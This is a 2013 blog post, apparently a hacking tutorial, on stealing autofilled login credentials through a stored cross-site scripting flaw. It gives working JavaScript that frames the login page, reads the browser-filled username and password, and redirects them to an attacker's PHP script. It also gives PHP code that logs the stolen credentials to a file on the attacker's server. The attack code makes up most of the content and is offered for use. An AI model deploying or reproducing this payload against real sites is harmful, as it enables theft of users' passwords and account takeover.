January 11, 2013

Stealing passwords with autocomplete and XSS

By depasonico

Hi again, well this time we have a new way to use Cross Site Scripting and Auto complete vulnerabilities. Yes, my young padawans Auto complete is a vulnerability, which scanners mark in low-level; we need to focus in all your vulnerabilities.

 Here we go again, this web application is from internet,that  is for testing so we don’t have any problem with FBI or police so, we can do whatever we want.

 First we need auto complete function this can be found when you login into a web application.

autocomplete

After this if your application is like mine (so many times happen) there is a cross site scripting vulnerability, in this case we have a good one that is cross site scripting stored.

XSS_2

So we need to make a JavaScript that makes a form in a fly, after we need to make a script that gets data from our form and sends it to our server.

codigo_java

var frameset = document.createElement(‘frameset’);
var frame1 = document.createElement(‘frame’);
document.body.appendChild(frameset);
frame1.setAttribute(‘src’,’login.php’);
frameset.appendChild(frame1);

setTimeout(showLogin,1000);

function showLogin()
{
     var user = parent.frames[0].document.forms[0].elements[0].value;
     var pass = parent.frames[0].document.forms[0].elements[1].value;
     var data = ‘user:’+user+’ ‘+’pass:’ + pass;
     location.href=”yourphpscript.php?x=” + data;
}

Also we need a php script; this script needs to get our data and saves it in a file.

codigo_php

<?php
$data = $_GET[‘x’];
$all = “\n”.$data.”\n”.”******************”;
$file = “data.txt”;
$fp = fopen($file, “a”) or die(“Couldn’t open $file for login!”);
       fwrite($fp, $all) or die(“Couldn’t open new page!”);
       fclose($fp);
       header( ‘Location: otherpage’ ) ;
?>

Well maybe you’re asking about the action at this pint so we need just to click and send our payload to victim’s application.

 XSS_3

XSS_4

We need to check our txt file in our hacking server, and…

 txt_file

So maybe you think the main vulnerability is XSS, well you’re wrong the main is auto complete because that little thing doesn’t have an idea about security like us so it sends information without asking us.

Just remember, eggness comes with insecurity.

 

Thanks to shellhellboy@gmail.com for his apache server.

This entry was posted on Friday, January 11th, 2013 at 8:30 pm and posted in Random. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a comment